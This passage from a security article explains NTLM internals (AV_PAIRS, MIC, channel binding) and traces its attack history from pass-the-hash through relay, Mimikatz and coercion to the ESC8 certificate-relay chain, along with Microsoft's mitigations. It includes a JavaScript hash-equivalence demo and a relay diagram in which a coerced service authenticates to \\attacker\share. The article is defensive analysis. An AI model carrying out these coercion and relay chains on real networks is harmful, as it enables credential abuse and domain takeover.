&lt;p&gt;AV_PAIRS is a TLV structure. The server places target NetBIOS, target DNS, a timestamp, and various flags into the &lt;code&gt;TargetInfo&lt;/code&gt; of &lt;code&gt;CHALLENGE&lt;/code&gt;. The client echoes the structure into &lt;code&gt;AUTHENTICATE&lt;/code&gt; and adds two retrofit fields when both ends agree to use them [@ms-nlmp]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;MsvAvFlags&lt;/code&gt;&lt;/strong&gt; is a bit field signalling that the client has computed a MIC and is therefore willing to bind all three NTLM messages together.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;MsvAvChannelBindings&lt;/code&gt;&lt;/strong&gt; holds the 16-byte MD5 hash of the GSS channel-bindings structure; for TLS EPA, that structure carries the RFC 5929 &lt;code&gt;tls-server-end-point&lt;/code&gt; certificate hash, binding the authentication to the HTTPS channel the client can see. This is the Extended Protection for Authentication (EPA) channel-binding-token mechanism [@ms-epa-wcf].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The MIC field itself is added to &lt;code&gt;AUTHENTICATE&lt;/code&gt;. It is &lt;code&gt;HMAC_MD5(ExportedSessionKey, NEGOTIATE || CHALLENGE || AUTHENTICATE)&lt;/code&gt;. &lt;code&gt;ExportedSessionKey&lt;/code&gt; coincides with &lt;code&gt;SessionBaseKey&lt;/code&gt; in the common case; when &lt;code&gt;NTLMSSP_NEGOTIATE_KEY_EXCH&lt;/code&gt; is set, the client generates a random session key, encrypts it under &lt;code&gt;KeyExchangeKey&lt;/code&gt;, and &lt;code&gt;ExportedSessionKey&lt;/code&gt; is the random key. The MIC always uses &lt;code&gt;ExportedSessionKey&lt;/code&gt;, and it is intended to make tampering with any of the three messages detectable [@ms-nlmp].&lt;/p&gt;

A length-prefixed TLV list carried inside the `TargetInfo` byte string of NTLM `CHALLENGE` and the AV-list byte string of `AUTHENTICATE`. AV_PAIRS hold the target server names, a timestamp, the `MsvAvFlags`, the `MsvAvChannelBindings` (EPA), and the optional `MsvAvTargetName` (SPN). NTLMv2 reserved AV_PAIRS in 1998 but most of the fields are 2009-2019-era retrofits onto the original wire format [@ms-nlmp].

A 16-byte HMAC-MD5, keyed by `ExportedSessionKey`, computed over the concatenation of the NTLM `NEGOTIATE`, `CHALLENGE`, and `AUTHENTICATE` messages and embedded in `AUTHENTICATE`. (`ExportedSessionKey` equals `SessionBaseKey` unless `NTLMSSP_NEGOTIATE_KEY_EXCH` is negotiated; the MIC always uses the exported key.) Introduced as a retrofit so that a man-in-the-middle relay could not silently strip the signing-required flags from the negotiate phase. Drop-the-MIC (CVE-2019-1040) demonstrated that the *presence* of the MIC was itself a negotiated property and could be stripped [@ms-nlmp, @nvd-cve-2019-1040].

An MD5 hash of the GSS channel-bindings structure (which carries the server&apos;s `tls-server-end-point` certificate hash) placed in `MsvAvChannelBindings` so the authentication is bound to the specific TLS channel the client believed it was talking over. When both ends enforce CBT, an attacker who terminates one TLS channel and opens a different TLS channel to the real server cannot reuse the captured NTLM response. Microsoft documents enforcement as off, when-supported, and required (WCF `Never` / `WhenSupported` / `Always`) [@ms-epa-wcf].
&lt;h3&gt;Run it&lt;/h3&gt;
&lt;p&gt;The whole thing fits in a few dozen lines of JavaScript. The point of the runnable demo is not to teach you to crack hashes; it is to make the password-equivalence claim land as code rather than as an assertion.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the [MS-NLMP] NTLMv2 response algorithm.
//
// The point: NTProofStr is a deterministic function of the NT-hash plus
// values that travel in the clear or that the attacker controls. If you
// possess the NT-hash, you can compute NTProofStr for any (challenge,
// client_challenge, timestamp, av_pairs). That is the protocol-level
// proof of password-equivalence.
//
// In a real client, NT-hash = MD4(UTF-16LE(password)). MD4 is removed from
// most modern browser/Node crypto providers, so we use a precomputed
// NT-hash for password &quot;Summer2026!&quot; and focus on the structural property
// that matters: knowledge of those 16 bytes is sufficient forever.&lt;/p&gt;
&lt;p&gt;const crypto = require(&quot;crypto&quot;);&lt;/p&gt;
&lt;p&gt;// Precomputed NT-hash for password &quot;Summer2026!&quot; (16 bytes, hex):
//   reference value verified against impacket&apos;s NTOWFv1() helper offline.
const ntHash = Buffer.from(&quot;41aed72cec76816423703d8e545eea31&quot;, &quot;hex&quot;);&lt;/p&gt;
&lt;p&gt;const user = &quot;alice&quot;, domain = &quot;CONTOSO&quot;;&lt;/p&gt;
&lt;p&gt;// NTOWFv2 = HMAC-MD5(NT-hash, UNICODE(Upper(user) || domain))
const userDomain = Buffer.from((user.toUpperCase() + domain), &quot;utf16le&quot;);
const ntowfv2 = crypto.createHmac(&quot;md5&quot;, ntHash).update(userDomain).digest();&lt;/p&gt;
&lt;p&gt;// NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)
// where temp = ResponserVersion(0x01) || HiResponserVersion(0x01) || Z(6) ||
//              Time(8) || ClientChallenge(8) || Z(4) || ServerName || Z(4)
const serverChal = Buffer.from(&quot;0123456789abcdef&quot;, &quot;hex&quot;);
const clientChal = Buffer.from(&quot;fedcba9876543210&quot;, &quot;hex&quot;);
const ts = Buffer.alloc(8);                       // any 8-byte FILETIME
const serverName = Buffer.from(&quot;00000000&quot;, &quot;hex&quot;); // empty AV_PAIR list
const tempBuf = Buffer.concat([
  Buffer.from(&quot;0101000000000000&quot;, &quot;hex&quot;),           // version 1.1 || Z(6)
  ts, clientChal,
  Buffer.from(&quot;00000000&quot;, &quot;hex&quot;),                 // Z(4)
  serverName,
  Buffer.from(&quot;00000000&quot;, &quot;hex&quot;),                 // Z(4)
]);
const ntProofStr = crypto.createHmac(&quot;md5&quot;, ntowfv2)
  .update(Buffer.concat([serverChal, tempBuf])).digest();&lt;/p&gt;
&lt;p&gt;console.log(&quot;NT-hash    :&quot;, ntHash.toString(&quot;hex&quot;));
console.log(&quot;NTOWFv2    :&quot;, ntowfv2.toString(&quot;hex&quot;));
console.log(&quot;NTProofStr :&quot;, ntProofStr.toString(&quot;hex&quot;));
console.log(&quot;&quot;);
console.log(&quot;Now change serverChal/clientChal/ts and rerun: NTProofStr changes,&quot;);
console.log(&quot;but only the &lt;em&gt;first&lt;/em&gt; line of input (the NT-hash) is a secret. The&quot;);
console.log(&quot;rest travels in the clear inside the three NTLM messages. Possessing&quot;);
console.log(&quot;ntHash IS possessing the credential -- forever, on every server.&quot;);
`}&lt;/p&gt;
&lt;p&gt;The demo prints three lines, then a punchline. The lines are not impressive; the punchline is.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The NT-hash is not a credential; it &lt;em&gt;is&lt;/em&gt; the credential. Knowing the hash IS authentication. Every pass-the-hash tool ever written, from Paul Ashton&apos;s modified Samba in 1997 to the present, is a different packaging of the same realisation: an authentication that is a deterministic function of a static secret turns possession of that secret into permanent authority [@wp-pass-the-hash].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If possession of the hash is the protocol, the last 28 years of attacks are not surprises -- they are obvious next steps. What are those steps?&lt;/p&gt;
&lt;h2&gt;4. The Three-Decade Attack Cascade&lt;/h2&gt;
&lt;p&gt;Five generations of attacks. Each one is named, each one is dated, each one took Microsoft years to respond to, and each Microsoft response always closed the &lt;em&gt;primitive&lt;/em&gt; and left the &lt;em&gt;class&lt;/em&gt; alive. They are not five surprises; they are five logical consequences of the wire protocol you just read.&lt;/p&gt;
&lt;h3&gt;Generation 1 -- 1997: Pass-the-Hash (Paul Ashton)&lt;/h3&gt;
&lt;p&gt;The first published exploit of password-equivalence comes from Paul Ashton, posted to the Bugtraq mailing list in 1997. Ashton ships a patch against the Samba SMB client that takes a 16-byte NT-hash directly on the command line, &lt;em&gt;instead&lt;/em&gt; of asking for a cleartext password [@wp-pass-the-hash]. The patch is a one-paragraph change against an open-source codebase, and that fact -- the brevity of the change -- is the lesson.&lt;/p&gt;
&lt;p&gt;The NTLM response function has no input that depends on knowing the plaintext password. Replacing the plaintext-password input with a literal NT-hash input does not change the bytes that go on the wire. The server cannot tell the difference.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response, for more than a decade, is &lt;em&gt;do not lose your hashes&lt;/em&gt;. There is no protocol fix because there is no protocol bug to fix; the design is doing exactly what it was designed to do. The response is operational guidance: tier your admins, scrub LSASS, do not run privileged sessions on workstations.&lt;/p&gt;
&lt;h3&gt;Generation 2 -- 2001: NTLM Relay (Sir Dystic / SMBRelay)&lt;/h3&gt;
&lt;p&gt;If you do not have to &lt;em&gt;steal&lt;/em&gt; the hash to use the credential, you also do not have to &lt;em&gt;steal&lt;/em&gt; the live exchange. You can simply &lt;em&gt;relay&lt;/em&gt; it. On March 31, 2001, at the @lanta.con conference, Sir Dystic of the Cult of the Dead Cow (Josh Buchbinder) releases SMBRelay: a small program that accepts an SMB connection on port 139, opens a second SMB connection back to &lt;em&gt;another&lt;/em&gt; server, and shuttles the NEGOTIATE / CHALLENGE / AUTHENTICATE messages between the two sides [@cdc-smbrelay].&lt;/p&gt;
&lt;p&gt;The attack works because the three NTLM messages are not bound to a particular client, server, or service. Whoever sits between them can replay the credential against whatever destination the attacker chooses, as that user, for the duration of the exchange.The colourful provenance matters. The Cult of the Dead Cow released SMBRelay alongside Back Orifice 2000; &quot;Sir Dystic&quot; is the same Josh Buchbinder who later wrote the SMBProxy authentication-relay framework. The point is not the chrome -- it is that the relay class was disclosed publicly &lt;em&gt;at a conference&lt;/em&gt; in 2001, with working code on the cDc website, and Microsoft did not ship a fix for the trivial case (self-relay) until November 2008 [@cdc-smbrelay].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response is incomplete and slow. SMB signing exists from Windows 2000 onward, but it is off by default on member servers for more than a decade [@ms-smb-signing]. MS08-068, in November 2008, finally patches the &lt;em&gt;self-relay&lt;/em&gt; case (CVE-2008-4037): the SMB server now refuses to accept an authentication that the client itself just generated against the same server [@nvd-cve-2008-4037]. NVD notes that reliable sources report the original fix as insufficient for CVE-2000-0834 -- meaning the patch closed exactly the self-relay case and nothing else [@nvd-cve-2008-4037]. Seven years to fix the simplest variant; the &lt;em&gt;cross-server&lt;/em&gt; relay class is still wide open.&lt;/p&gt;
&lt;h3&gt;Generation 3 -- 2008-2014: Credential Theft as a Service&lt;/h3&gt;
&lt;p&gt;By 2008, the operational guidance &quot;do not lose your hashes&quot; stops being defensible. On February 29, 2008, Hernan Ochoa releases the Pass-the-Hash Toolkit v1.3, two native Windows binaries called &lt;code&gt;iam.exe&lt;/code&gt; and &lt;code&gt;whosthere.exe&lt;/code&gt; that read the NT-hash out of LSASS memory and inject it into a new logon session. PtH stops being a Linux-and-Samba trick and becomes a Windows-everywhere reality.&lt;/p&gt;
&lt;p&gt;Three years later, Benjamin Delpy publishes &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Mimikatz&lt;/a&gt;. The first version is closed-source, released in May 2011 [@wired-greenberg-mimikatz]. By April 6, 2014, the GitHub repository goes public with the version string &quot;mimikatz 2.0 alpha (x86) release &apos;Kiwi en C&apos; (Apr 6 2014 22:02:03)&quot; [@gh-mimikatz]. The repo description is a near-perfect summary of what LSASS is to an attacker: &quot;extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets&quot; [@gh-mimikatz]. LSASS becomes the universal credential oracle.Delpy did not intend Mimikatz to be a weapon. Wired&apos;s Andy Greenberg documents the trajectory in detail: Delpy &quot;released it publicly in May 2011, but as a closed source program.&quot; In mid-2011, Delpy learned for the first time that Mimikatz had been used in an intrusion of an unnamed foreign government network. That September, it appeared again in the landmark DigiNotar hack. An unidentified man was found at his laptop in his Moscow conference hotel room -- the stranger apologised and quickly left, claiming a wrong room. A second man in a dark suit later demanded a copy of Mimikatz on a USB drive. He went open-source partly fearing for his own safety after the hotel confrontations, and partly to make the security industry confront what lived in LSASS [@wired-greenberg-mimikatz].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response is structural and specific. Credential Guard ships in Windows 10 RTM (Enterprise and Education editions), July 29, 2015 [@ms-credential-guard]. It uses Virtualization-Based Security to isolate &lt;code&gt;lsaiso.exe&lt;/code&gt; in VTL1 within the same root partition; the kernel can no longer read NTLM hashes or Kerberos TGTs even at SYSTEM-level privilege. Protected Users and Restricted Admin in Server 2012 R2 / Windows 8.1 narrow the surface further. LSASS-as-PPL adds a process-protection layer between user-mode debuggers and the LSASS address space [@ms-credential-guard].&lt;/p&gt;
&lt;p&gt;Credential Guard works -- against the credential-&lt;em&gt;theft&lt;/em&gt; class. It does nothing against credential-&lt;em&gt;use&lt;/em&gt;. An attacker who never extracts a hash, because they never need to, sails right past it. Relay does not need the hash. Coercion does not need the hash. ESC8 does not need the hash. That is the next generation.&lt;/p&gt;
&lt;h3&gt;Generation 4 -- 2018-2021: Forced-Authentication Coercion&lt;/h3&gt;
&lt;p&gt;In 2018 at DerbyCon 8, Lee Christensen releases SpoolSample, known publicly as &quot;PrinterBug.&quot; The GitHub description is exact: &quot;PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface&quot; [@gh-spoolsample]. The trick is that the Print Spooler service runs as SYSTEM, accepts a remote RPC call (&lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt;) that takes a UNC path, and dutifully NTLM-authenticates back to whatever path the caller named -- on behalf of the machine account. Any Windows service running as SYSTEM that accepts a UNC path is a confused deputy that will authenticate on demand.&lt;/p&gt;

Microsoft&apos;s initial classification of SpoolSample was *authenticated-only / by design*: a caller needed valid domain credentials to reach the spooler endpoint, and authenticated callers triggering machine-account authentications was deemed within spec. The classification held through 2018, 2019, and most of 2020. PetitPotam broke it, because PetitPotam used MS-EFSRPC over LSARPC, which accepts *unauthenticated* binds on a domain controller&apos;s named-pipe interface. With the authentication requirement gone, &quot;by design&quot; stopped being a coherent defence. Microsoft started shipping fixes.
&lt;p&gt;Marina Simakov and Yaron Zinar of Preempt (now CrowdStrike) publish &quot;Drop the MIC&quot; on June 11, 2019. The vulnerability is CVE-2019-1040: a tampering bug where &quot;a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection&quot; [@crowdstrike-drop-the-mic, @nvd-cve-2019-1040]. The bypass works by stripping the &lt;code&gt;NTLMSSP_NEGOTIATE_SIGN&lt;/code&gt; and &lt;code&gt;NTLMSSP_NEGOTIATE_ALWAYS_SIGN&lt;/code&gt; flags from the initial &lt;code&gt;NEGOTIATE&lt;/code&gt;, removing the MIC field from &lt;code&gt;AUTHENTICATE&lt;/code&gt;, and removing the &lt;code&gt;Version&lt;/code&gt; field that drives MIC detection.&lt;/p&gt;
&lt;p&gt;Servers that should have required a MIC silently accept the modified message. The MIC -- the retrofit integrity layer that was supposed to make tampering detectable -- turns out to be itself untethered to the negotiation [@crowdstrike-drop-the-mic].&lt;/p&gt;
&lt;p&gt;Lionel Gilles (topotam77) publishes PetitPotam in July 2021, CVE-2021-36942. The GitHub repository description reads: &quot;PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions&quot;. The decisive new property compared to SpoolSample is that PetitPotam needs &lt;em&gt;no credentials&lt;/em&gt; against a domain controller: LSARPC accepts unauthenticated binds, so the coercion can be triggered by an attacker who has merely joined the network.&lt;/p&gt;
&lt;p&gt;In 2022, Remi Gascou (p0dalirius) publishes Coercer, a Python script that consolidates the coercion class across MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, and many more RPC interfaces. The README describes it succinctly: &quot;A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods&quot; [@gh-coercer].&lt;/p&gt;
&lt;h3&gt;Generation 5 -- 2021: ADCS Web-Enrollment Relay (ESC8)&lt;/h3&gt;
&lt;p&gt;On June 17, 2021, Will Schroeder and Lee Christensen of SpecterOps publish &quot;Certified Pre-Owned,&quot; a whitepaper and matching blog post that maps eight new attack classes against Active Directory Certificate Services [@specterops-cert-preowned-blog, @specterops-cert-preowned-pdf]. ESC1 through ESC7 are template and configuration weaknesses. ESC8 is the keystone of this article.&lt;/p&gt;
&lt;p&gt;ESC8 says: AD CS Web Enrollment endpoints (&lt;code&gt;/certsrv/&lt;/code&gt;) accept NTLM authentication. Coerce a server&apos;s machine account to authenticate to your relay listener; relay the authentication to &lt;code&gt;/certsrv/&lt;/code&gt;; enroll the relayed identity for a machine-template certificate; use that certificate to perform PKINIT against the KDC and request a TGT [@specterops-cert-preowned-blog]. The NTLM-vs-Kerberos boundary stops being a meaningful one. NTLM is the protocol on the front side of the attack; Kerberos is the trust token on the back side; the certificate is the conduit between them.&lt;/p&gt;
&lt;p&gt;The point of ESC8 is not just that it works. The point is that it works against a perfectly retrofitted environment. SMB signing did not enter the chain. LDAP signing did not enter the chain. EPA was supposed to enter the chain on the &lt;code&gt;/certsrv/&lt;/code&gt; side but was unevenly deployed. Credential Guard never had a hash to protect.&lt;/p&gt;

flowchart TD
    A[Gen 1 -- 1997 Pass-the-Hash&lt;br /&gt;Paul Ashton, modified Samba]
    A --&amp;gt; A1[Response: operational guidance&lt;br /&gt;Do not lose your hashes]
    A1 --&amp;gt; B[Gen 2 -- 2001 SMBRelay&lt;br /&gt;Sir Dystic, atlanta.con]
    B --&amp;gt; B1[Response: MS08-068 2008&lt;br /&gt;Patches self-relay only]
    B1 --&amp;gt; C[Gen 3 -- 2008-2014 LSASS extraction&lt;br /&gt;Ochoa PtH Toolkit, Delpy Mimikatz]
    C --&amp;gt; C1[Response: Credential Guard 2015&lt;br /&gt;Closes theft; not use]
    C1 --&amp;gt; D[Gen 4 -- 2018-2021 Coercion&lt;br /&gt;SpoolSample, Drop-the-MIC, PetitPotam, Coercer]
    D --&amp;gt; D1[Response: KB 5005413, EPA&lt;br /&gt;Closes primitive; not class]
    D1 --&amp;gt; E[Gen 5 -- 2021 ESC8&lt;br /&gt;Schroeder/Christensen Certified Pre-Owned]
    E --&amp;gt; E1[Response: remove NTLM]

sequenceDiagram
    autonumber
    actor A as Attacker
    participant V as &quot;Victim SYSTEM service (Spooler, EFSR, DFSNM)&quot;
    participant R as Attacker NTLM relay
    participant T as &quot;Target service (LDAP, SMB, certsrv)&quot;
    A-&amp;gt;&amp;gt;V: RPC call with UNC path \\attacker\share
    V-&amp;gt;&amp;gt;R: NTLM NEGOTIATE (as machine account)
    R-&amp;gt;&amp;gt;T: Open new authenticated session
    T-&amp;gt;&amp;gt;R: NTLM CHALLENGE
    R-&amp;gt;&amp;gt;V: Forward CHALLENGE
    V-&amp;gt;&amp;gt;R: NTLM AUTHENTICATE (signed by machine account)
    R-&amp;gt;&amp;gt;T: Forward AUTHENTICATE -- T treats attacker session as the victim
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Public date&lt;/th&gt;
&lt;th&gt;Microsoft response&lt;/th&gt;
&lt;th&gt;What survived&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1. Pass-the-Hash&lt;/td&gt;
&lt;td&gt;Use the hash directly&lt;/td&gt;
&lt;td&gt;1997, Paul Ashton, Bugtraq [@wp-pass-the-hash]&lt;/td&gt;
&lt;td&gt;Operational guidance&lt;/td&gt;
&lt;td&gt;Hash is still password-equivalent on the wire&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. NTLM relay (SMB)&lt;/td&gt;
&lt;td&gt;Forward live exchange&lt;/td&gt;
&lt;td&gt;March 31, 2001, Sir Dystic, @lanta.con [@cdc-smbrelay]&lt;/td&gt;
&lt;td&gt;MS08-068 (Nov 2008) -- self-relay only [@nvd-cve-2008-4037]&lt;/td&gt;
&lt;td&gt;Cross-server, cross-protocol relay&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. LSASS extraction&lt;/td&gt;
&lt;td&gt;Steal hashes from memory&lt;/td&gt;
&lt;td&gt;Feb 2008 (Ochoa); May 2011 closed / Apr 2014 open (Delpy) [@gh-mimikatz, @wired-greenberg-mimikatz]&lt;/td&gt;
&lt;td&gt;Credential Guard (Jul 29, 2015) [@ms-credential-guard]&lt;/td&gt;
&lt;td&gt;Hash &lt;em&gt;use&lt;/em&gt; outside LSASS path; SYSTEM-level Mimikatz on the SAM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4. Coercion&lt;/td&gt;
&lt;td&gt;Make SYSTEM authenticate on demand&lt;/td&gt;
&lt;td&gt;2018 SpoolSample [@gh-spoolsample]; 2019 Drop-the-MIC [@crowdstrike-drop-the-mic, @nvd-cve-2019-1040]; 2021 PetitPotam; 2022 Coercer [@gh-coercer]&lt;/td&gt;
&lt;td&gt;Per-interface patches; KB 5005413 EPA recipe [@ms-kb5005413]&lt;/td&gt;
&lt;td&gt;The pattern of &quot;SYSTEM holds an unanchored credential&quot;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5. ESC8 ADCS Web Enrollment relay&lt;/td&gt;
&lt;td&gt;NTLM coerce -&amp;gt; /certsrv/ -&amp;gt; TGT via PKINIT&lt;/td&gt;
&lt;td&gt;June 17, 2021, Schroeder/Christensen, &quot;Certified Pre-Owned&quot; [@specterops-cert-preowned-blog, @specterops-cert-preowned-pdf]&lt;/td&gt;
&lt;td&gt;KB 5005413; AD CS hardening; eventually Phase 3 of NTLM removal&lt;/td&gt;
&lt;td&gt;Kerberos relay class on the other side (KrbRelay/KrbRelayUp) [@gh-krbrelayup]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

KrbRelayUp -- a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings). -- Dec0ne, KrbRelayUp README [@gh-krbrelayup]
&lt;p&gt;The reader who started Section 4 believing &quot;if I patch each named NTLM attack, the protocol is safe&quot; finishes Section 4 believing something else. Every retrofit patches a &lt;em&gt;primitive&lt;/em&gt;; none addresses the &lt;em&gt;existence&lt;/em&gt; of the fallback path. The next attack is always one cross-protocol step away. The retrofit strategy is structurally incapable of closing the class.&lt;/p&gt;
&lt;p&gt;By the end of 2021, NTLM-the-protocol cannot be removed because four use cases require it, and NTLM-the-fallback cannot be kept because ESC8 turned it into a domain-takeover oracle. Something has to change. What?&lt;/p&gt;
&lt;h2&gt;5. The Retrofit Strategy and Its Funeral&lt;/h2&gt;
&lt;p&gt;Before naming the answer, name the strategy that failed. Microsoft&apos;s defensive cadence between 2001 and 2021 splits into three families, each effective against a named primitive, each defeated by an unanchored cousin of that primitive.&lt;/p&gt;
&lt;h3&gt;Family A -- Per-protocol message authentication&lt;/h3&gt;
&lt;p&gt;SMB signing. LDAP signing and sealing. The idea is to anchor the &lt;em&gt;content&lt;/em&gt; of each authenticated request inside a per-session signature derived from the authentication. SMB signing introduces an HMAC over every SMB message keyed by a per-session &lt;code&gt;SigningKey&lt;/code&gt;; LDAP signing and sealing do the equivalent for LDAP operations [@ms-smb-signing].&lt;/p&gt;
&lt;p&gt;Family A works when the &lt;em&gt;target&lt;/em&gt; protocol enforces it. SMB-to-SMB relay against an SMB server with required signing fails; LDAP-to-LDAP relay against an LDAP server with required signing fails. The strategy assumes the attacker stays in the same protocol family. Cross-protocol relay -- SMB authentication relayed to LDAP, or SMB authentication relayed to &lt;code&gt;/certsrv/&lt;/code&gt; -- defeats it. The MS-EFSR coercion can produce an authentication that originates &quot;as if from SMB&quot; and gets accepted by an unrelated HTTPS service that ignores the SMB signing flag entirely [@nvd-cve-2019-1040, @specterops-cert-preowned-blog].&lt;/p&gt;
&lt;h3&gt;Family B -- Per-channel binding tokens and the MIC&lt;/h3&gt;
&lt;p&gt;EPA (channel binding) and the NTLMv2 MIC are the response to cross-protocol relay. Both try to tie the authentication to &lt;em&gt;the specific channel&lt;/em&gt; the client believes it is using. EPA places a hash of the TLS endpoint certificate into the &lt;code&gt;MsvAvChannelBindings&lt;/code&gt; AV_PAIR; an HTTPS server with EPA required compares it to its own certificate&apos;s hash and rejects the authentication if they do not match [@ms-epa-wcf]. The MIC binds all three NTLM messages together so a relay cannot strip the signing-required flags from &lt;code&gt;NEGOTIATE&lt;/code&gt; after the client sets them [@ms-nlmp].&lt;/p&gt;
&lt;p&gt;Family B works when both ends agree to enforce. Drop-the-MIC (CVE-2019-1040) demonstrated that the &lt;em&gt;presence&lt;/em&gt; of the MIC was negotiated and could be stripped, so a server that supported MIC-less clients silently accepted MIC-less messages from a relay [@crowdstrike-drop-the-mic, @nvd-cve-2019-1040]. EPA suffers from the same enforcement-asymmetry: when an AD CS web endpoint runs with EPA disabled or merely opportunistic (WCF &lt;code&gt;policyEnforcement=&quot;Never&quot;&lt;/code&gt; or &lt;code&gt;&quot;WhenSupported&quot;&lt;/code&gt;), the binding is not enforced. KB 5005413 published the explicit &lt;code&gt;&amp;lt;extendedProtectionPolicy policyEnforcement=&quot;Always&quot; /&amp;gt;&lt;/code&gt; recipe for &lt;code&gt;/certsrv/&lt;/code&gt; because field deployments had been running with weaker settings [@ms-kb5005413].&lt;/p&gt;
&lt;h3&gt;Family C -- Credential isolation&lt;/h3&gt;
&lt;p&gt;Credential Guard. LSASS-as-PPL. Protected Users. Restricted Admin. These attack the &lt;em&gt;theft&lt;/em&gt; surface. Credential Guard moves the NT-hash into &lt;code&gt;lsaiso.exe&lt;/code&gt; inside VTL1; the kernel can no longer read it. Microsoft now ships it enabled by default on domain-joined, non-DC systems running Windows 11 22H2 and Server 2025 on hardware that meets the requirements [@ms-credential-guard].&lt;/p&gt;
&lt;p&gt;Family C is honest about what it covers. It does nothing about coercion flows that never touch the NT-hash. PetitPotam and ESC8 do not need a hash; the relay session uses the live NTLM exchange and is never persisted. Credential Guard cannot help.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Family&lt;/th&gt;
&lt;th&gt;What it closes&lt;/th&gt;
&lt;th&gt;What it does not close&lt;/th&gt;
&lt;th&gt;Defeating attack&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;A. Per-protocol message auth (SMB/LDAP signing)&lt;/td&gt;
&lt;td&gt;Same-protocol relay against the target&lt;/td&gt;
&lt;td&gt;Cross-protocol relay; targets that do not enforce&lt;/td&gt;
&lt;td&gt;LDAP relay from SMB coercion [@nvd-cve-2019-1040]; ESC8 relay to /certsrv/&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B. Channel binding (EPA) + MIC&lt;/td&gt;
&lt;td&gt;Same-channel relay through TLS termination&lt;/td&gt;
&lt;td&gt;MIC stripping in negotiation; EPA at None/Partial; non-TLS targets&lt;/td&gt;
&lt;td&gt;Drop-the-MIC [@nvd-cve-2019-1040]; under-enforced EPA [@ms-kb5005413]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C. Credential isolation (Credential Guard, LSASS-PPL)&lt;/td&gt;
&lt;td&gt;Hash theft from running LSASS&lt;/td&gt;
&lt;td&gt;Hash &lt;em&gt;use&lt;/em&gt; in live relay; SAM extraction from disk; coercion&lt;/td&gt;
&lt;td&gt;ESC8 + PetitPotam [@specterops-cert-preowned-blog]; SAM hive offline [@ms-credential-guard]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every retrofit Microsoft has shipped against NTLM attacks one &lt;em&gt;primitive&lt;/em&gt; of NTLM. None address the &lt;em&gt;existence&lt;/em&gt; of NTLM as a fallback path. ESC8 was the funeral of the retrofit strategy because ESC8 turned a fully retrofitted environment into a domain takeover without defeating any retrofit.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Certified Pre-Owned&quot; did not break a Microsoft fix; it composed the existing infrastructure. The chain assumes SMB signing is on, EPA is on (somewhere), and Credential Guard is on. It still works, because none of those controls cover the path that goes Coercer -&amp;gt; NTLM relay -&amp;gt; AD CS Web Enrollment -&amp;gt; PKINIT. After 2021, the question stopped being &quot;what&apos;s the next retrofit?&quot; and became &quot;what does it take to remove the fallback?&quot; [@specterops-cert-preowned-blog, @ms-kb5005413].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To remove ESC8 without rebuilding AD CS, Microsoft has to remove NTLM. To remove NTLM, Microsoft has to remove the four reasons NTLM existed as a fallback in the first place. What does that look like in shippable form?&lt;/p&gt;
&lt;h2&gt;6. The Breakthrough: Closing the Fallback&lt;/h2&gt;
&lt;p&gt;October 11, 2023. Matthew Palko, Windows IT Pro Blog. &quot;The evolution of Windows authentication.&quot; For the first time in twenty-three years, Microsoft publicly commits to &lt;em&gt;removing&lt;/em&gt; NTLM, not restricting it, and names the three load-bearing features that make removal possible [@palko-2023-evolution].&lt;/p&gt;
&lt;p&gt;The plan starts where every honest plan starts -- by stating the problem in its own words. There are four fallback reasons NTLM persisted: no DC line-of-sight, no domain at all (local accounts), no SPN for the target, and hard-coded NTLM in application code [@palko-2023-evolution]. Each gets an engineered answer. The four-to-three correspondence (three protocols plus one refactor) is the new architecture.&lt;/p&gt;

Our end goal is eliminating the need to use NTLM at all to help improve the security bar of authentication for all Windows users. -- Matthew Palko, Microsoft Windows IT Pro Blog, October 11, 2023 [@palko-2023-evolution]
